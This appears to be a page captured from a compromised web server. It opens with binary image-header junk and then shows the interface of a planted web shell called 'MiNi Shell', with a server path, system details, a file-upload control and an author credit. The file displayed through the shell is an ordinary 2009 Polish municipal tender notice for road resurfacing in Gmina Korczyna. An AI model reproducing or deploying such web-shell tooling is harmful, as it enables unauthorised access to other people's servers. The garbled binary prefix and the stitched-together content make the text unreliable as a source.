JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090423/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090423/117992-N-2009.html

<p class="kh_header"><b>Korczyna: Wykonanie remontu nawierzchni masą mineralno-bitumiczną dróg gminnych na terenie Gminy Korczyna</b><br>
<b>Numer ogłoszenia: 117992 - 2009; data zamieszczenia: 23.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Korczyna , ul. Rynek 18a, 38-420 Korczyna, woj. podkarpackie, tel. 013 4354080, faks 013 4354096.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> korczyna.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie remontu nawierzchni masą mineralno-bitumiczną dróg gminnych na terenie Gminy Korczyna.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem wykonania jest wykonanie remontu nawierzchni masą mineralno-
    bitumiczną następujaych dróg gminnych:
  1) Nr 1 14843R Kombornia Dwór - cmentarz w Komborni - długość 0,310 km,
  2) Nr  ewid. działki drogowej 648 Krasna Granica w Krasnej - długość 0,207km.
  Zakres prac:
  a) wykonanie podbudowy
  b) wykonanie nawierzchni
  c) roboty wykończeniowe
 
2. Wymagania dodatkowe w ramach przedmiotu zamówienia:
    Wykonawca zobowiązuje się:
  a) wykonać przedmiot zamówienia zgodnie z obowiązującymi w tym zakresie  
      przepisami prawnymi, w szczególności Prawem Budowlanym wraz z przepisami 
      wykonawczymi, przepisami BHP, postanowieniami umowy, specyfikacją 
      istotnych warunków zamówienia, zgodnie z aktualnym poziomem wiedzy 
      technicznej, należytą starannością, etyką zawodową przez osoby posiadające 
      wymagane kwalifikacje i uprawnienia, 
  b) wykonać prace dodatkowe zlecone przez Zamawiającego o wartości do 50% 
      zamówienia podstawowego. W przypadku konieczności wykonania takich prac 
      Wykonawca przed przystąpieniem do  ich realizacji przedstawi Zamawiającemu 
      kosztorys do uzgodnienia. Zlecenie wykonania prac dodatkowych nastąpi przez 
      podpisanie odrębnej umowy,
 c) wykonać przedmiot zamówienia własnymi siłami bez zlecania prac 
     podwykonawcom, 
 d) za ewentualne szkody spowodowane podczas prac budowlanych na 
     nieruchomościach objętych inwestycją odpowiada Wykonawca..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
  1) posiadają uprawnienia do wykonywania określonej działalności lub czynności,  
      jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
  2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem 
      technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią 
      pisemne zobowiązanie innych podmiotów do udostępnienia potencjału 
      technicznego i osób zdolnych do wykonania zamówienia,
  3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
      zamówienia,
  4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na 
      podstawie art. 24 ust. 1 i 2 ustawy z dnia 29 stycznia 2004r. Prawo zamówień 
      publicznych  (Dz. U. z 2007r. 223 poz. 1655 z późn. zm). 
2. Z ubiegania się o udzielenie zamówienia publicznego wyklucza się:
  1) wykonawców, którzy nie spełniają warunków udziału w postępowaniu o 
      zamówienie publiczne, o których mowa w art. 24 ust.1 i 2 ustawy z dnia 29 
      stycznia 2004r. Prawa zamówień publicznych (Dz. U. z 2007r. Nr 223, poz. 
      1655 z późn. zm),
  2) wykonawców, którzy złożyli nieprawdziwe informacje mające wpływ na wynik 
      prowadzonego postępowania,
  3) wykonawców, którzy nie złożyli oświadczenia o spełnianiu warunków udziału w 
      postępowaniu lub dokumentów potwierdzających spełnianie tych warunków..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1/  formularz ofertowy z wykorzystaniem wzoru - załącznik nr 1 do SIWZ,
2/  oświadczenie Wykonawcy o spełnianiu warunków  wskazanych w art. 22 ust.1 
     Prawa zamówień publicznych, i nie podlegania  wykluczeniu z postępowania na 
     podstawie art. 24 Prawa zamówień publicznych -  załącznik nr 2 do  SIWZ,
3/  aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do 
     ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do 
     rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie 
     wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
4/  dokumenty potwierdzające uprawnienie do reprezentacji Wykonawcy przez 
     osoby podpisujące ofertę, o ile nie wynikają z przepisów prawa lub innych 
     dokumentów rejestrowych,
5/  wykaz osób, które będą wykonywać zamówienie  lub będą uczestniczyć w 
     wykonywaniu zamówienia wraz z informacją na temat ich kwalifikacji - załącznik 
     nr 3 do SIWZ, 
6/  dokument potwierdzający, że Wykonawca posiada aktualne, wymagane 
     przepisami prawa uprawnienia, jeżeli ustawy nakładają obowiązek posiadania 
     takich uprawnień oraz dokument potwierdzający przynależność do właściwej 
     izby samorządu zawodowego,
7/  wykaz wykonanych robót budowlanych w okresie  ostatnich 5 lat ( 2004-2008), 
     co najmniej dwóch zamówień związanych tematycznie z przedmiotem 
     zamówienia, o wartości nie mniejszej niż 100 000zł, z podaniem wartości robót 
     brutto, daty (rok), miejsca robót i nazwy Zamawiającego, a jeżeli okres 
     prowadzenia działalności jest krótszy w tym okresie -  załącznik nr 4 do SIWZ,
8/  dokumenty  potwierdzające, że roboty wymienione w ppkt 7 zostały wykonane 
     należycie,
9/  zaświadczenie właściwego Urzędu Skarbowego potwierdzające, że Wykonawca  
     nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał zgodę na 
     zwolnienie, odroczenie, rozłożenie na raty zaległych płatności lub wstrzymanie 
     w całości wykonania decyzji organu podatkowego, wystawione nie wcześniej 
     niż 3 miesiące przed upływem terminu składania ofert,
10/  zaświadczenie właściwego oddziału Zakładu  Ubezpieczeń Społecznych 
     potwierdzające, że wykonawca nie zalega z opłacaniem składek na 
     ubezpieczenie zdrowotne lub społeczne, wystawione nie wcześniej niż 3 
     miesiące przed upływem terminu składania ofert,
11/ wykaz sprzętu do realizacji zamówienia,
12/ oświadczenie o dokonaniu wizji lokalnej placu budowy,
13/ oświadczenie o proponowanym okresie gwarancji - minimum 36 miesięcy licząc 
     od daty odbioru  końcowego, 
14) polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest 
      ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej 
      działalności gospodarczej. Okres ważności polisy lub innego dokumentu 
      ubezpieczenia musi obejmować co najmniej przewidziany przez zamawiającego 
      w SIWZ okres realizacji zadania, w innym przypadku wykonawca winien 
      dołączyć do oferty oświadczenie o przedłożeniu Zamawiającemu kolejnego 
      dokumentu ubezpieczenia niezwłocznie po wygaśnięciu polisy/ innego 
      dokumentu ubezpieczenia, który dołącza do oferty,
15/ kosztorys ofertowy z podaniem nakładów  robocizny, materiałów i pracy 
      sprzętu oraz określenie stawki roboczogodziny, kosztów pośrednich, kosztów 
      zakupu materiałów i zysku.

    Dokumenty składane są w oryginale  lub kserokopii poświadczonej (za zgodność 
    z oryginałem) przez wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.korczyna.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Korczyna
ul. Rynek 18a,  POKÓJ NR 6,
38-420 Korczyna.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.05.2009 godzina 10:00, miejsce: Urząd Gminy Korczyna
ul. Rynek 18a,  pokój nr 13
38-420 Korczyna.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com